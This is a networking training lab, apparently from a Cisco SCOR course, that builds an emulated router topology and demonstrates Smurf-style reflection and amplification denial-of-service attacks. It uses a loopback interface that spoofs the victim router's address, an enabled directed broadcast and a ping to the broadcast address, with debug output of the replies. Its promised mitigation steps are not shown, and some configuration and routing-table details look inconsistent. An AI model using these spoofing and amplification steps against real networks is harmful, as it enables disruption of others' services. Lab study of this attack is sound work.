SCOR Lab 1: Smurf Attack

Smurf Attack

In Lab 1: Smurf Attack, participants typically delve into the detection and mitigation of a Smurf attack, a type of Distributed Denial of Service (DDoS) attack. This Security Core (SCOR) lab focuses on providing hands-on experience in recognizing and mitigating the Smurf attack's impact on a network. Participants may use various security tools and techniques to identify the characteristics of a Smurf attack, analyze the network traffic, and implement countermeasures to protect against such malicious activities. The lab aims to enhance participants' skills in understanding DDoS threats, strengthening their abilities to secure and defend networks against disruptive attacks, and contributing to effective cybersecurity practices. Successful completion of SCOR Lab 1 equips participants with valuable insights and practical experience in mitigating Smurf attacks within a security context.

Lab:

LAB Topology

This Lab was developed on IOS Version 15.2(4). In the following diagram, R1 is the attacker which will form EIGRP neighborship with the rest of the routers of the organization. After forming the neighborship, now attacker will be sending spoofed ICMP Echo-Request, spoofing the identity of victim R3. 

Task 1: Initial Configuration

Step 1: Configure IP R1, R2 and R3 Router.

R1#conf t
interface FastEthernet 0/0
ip address 10.0.1.1 255.255.255.0
no shut
interface loopback 1
ip address 10.0.3.3 255.255.255.255
exit

R2# conf t
interface FastEthernet 0/0
ip address 10.0.1.2 255.255.255.0
no shut
interface FastEthernet 1/0
ip address 10.0.2.2 255.255.255.0
no shut
interface FastEthernet 0/1
ip address 10.0.3.2 255.255.255.0
no shut

R3# conf t
interface FastEthernet 0/0
ip address 10.0.3.3 255.255.255.0
no shut

R4# conf t
interface FastEthernet 0/0
ip address 10.0.2.100 255.255.255.0
no shut

R5# conf t
interface FastEthernet 0/0
ip address 10.0.2.200 255.255.255.0
no shut

Step 2: Configure and Verify EIGRP on devices.

R1# conf t
router eigrp 100
network 10.0.1.0 255.255.255.0

R2# conf t
router eigrp 100
network 0.0.0.0

R3# conf t
router eigrp 100
network 0.0.0.0

R4# conf t
router eigrp 100
network 0.0.0.0

R5# conf t
router eigrp 100
network 0.0.0.0

Step 3: Once EIGRP is configured now verify the routing table of routers.

R1#show ip route

10.0.0.0/8 is variably subnetted, 4 subnets, 2 masks
D    10.0.2.0/24 \[90/284160\] via 10.0.1.2, 00:00:19, FastEthernet0/0
D    10.0.3.0/24 \[90/307200\] via 10.0.1.2, 00:00:19 FastEthernet0/0
C    10.0.3.3/32 is directly connected, Loopback 1
C    10.0.1.0/24 is directly connected, FastEthernet0/0

R2#show ip route
10.0.0.0/24 is subnetted, 3 subnets
C    10.0.1.0/24 is directly connected, FastEthernet0/0
D    10.0.2.0 \[90/284160\] via 10.0.3.2, 00:04:39 FastEthernet0/0
D    10.0.1.0 \[90/307200\] via 10.0.3.2, 00:04:39 FastEthernet0/0

Task 2: Perform Reflection Attack

From R1, spoof the IP address of R3(10.0.3.3) and send ICMP packets to R4. This request will generate some reply which will be seen on R3’s console. Thus, unwanted utilization of resources on R3 and R4 routers.

Step 1: Let us start by enabling debug on the R3 router.

R3# debug ip icmp

Step 2: Now we will spoof the identify of victim(R3) from R1(Attacker) and send ICMP packets to R4.

R1# ping 10.0.2.100 source loopback 1

Step 3: Now if we check the debug message on R3, it will have some reply coming from R4, resulting in reflection attack. This kind of reflection attack is similar to DOS attack.

R3#
ICMP: echo reply received, source 10.0.2.100, destination 10.0.3.3
ICMP: echo reply received, source 10.0.2.100, destination 10.0.3.3
ICMP: echo reply received, source 10.0.2.100, destination 10.0.3.3
ICMP: echo reply received, source 10.0.2.100, destination 10.0.3.3
ICMP: echo reply received, source 10.0.2.100, destination 10.0.3.3

Task 3: Perform Amplification Attack:

By default, a broadcast packet sent to a router will not be forwarded by the router instead it will be dropped. In our scenario, we will simulate this kind of attack by manually enabling directed broadcast on the router receiving the broadcast packet.

Step 1: Enable directed broadcast on R2 router to forward broadcast requests.

R2# conf t
ip directed-broadcast

Step 2: From R1(Attacker) send ICMP packet for 10.0.2.255 (broadcast) by spoofing the IP address of R3(Victim).

R1# ping 10.0.2.255 source loopback 1

Step 3: Verify debug message on R3 router. Here we will see that Attacker has sent one request for everyone in the 10.0.2.0 network using the VICTIM IP address. This request is getting reply from all devices in that network. Thus, exhausting more resources on the VICTIM machine. This kind of amplification attack is similar to DDOS attack.

R3#
ICMP: echo reply received, source 10.0.1.2, destination 10.0.3.3
ICMP: echo reply received, source 10.0.2.100, destination 10.0.3.3
ICMP: echo reply received, source 10.0.2.200, destination 10.0.3.3

ICMP: echo reply received, source 10.0.1.2, destination 10.0.3.3
ICMP: echo reply received, source 10.0.2.100, destination 10.0.3.3
ICMP: echo reply received, source 10.0.2.200, destination 10.0.3.3

ICMP: echo reply received, source 10.0.1.2, destination 10.0.3.3
ICMP: echo reply received, source 10.0.2.100, destination 10.0.3.3
ICMP: echo reply received, source 10.0.2.200, destination 10.0.3.3

ICMP: echo reply received, source 10.0.1.2, destination 10.0.3.3
ICMP: echo reply received, source 10.0.2.100, destination 10.0.3.3
ICMP: echo reply received, source 10.0.2.200, destination 10.0.3.3

ICMP: echo reply received, source 10.0.1.2, destination 10.0.3.3
ICMP: echo reply received, source 10.0.2.100, destination 10.0.3.3
ICMP: echo reply received, source 10.0.2.200, destination 10.0.3.3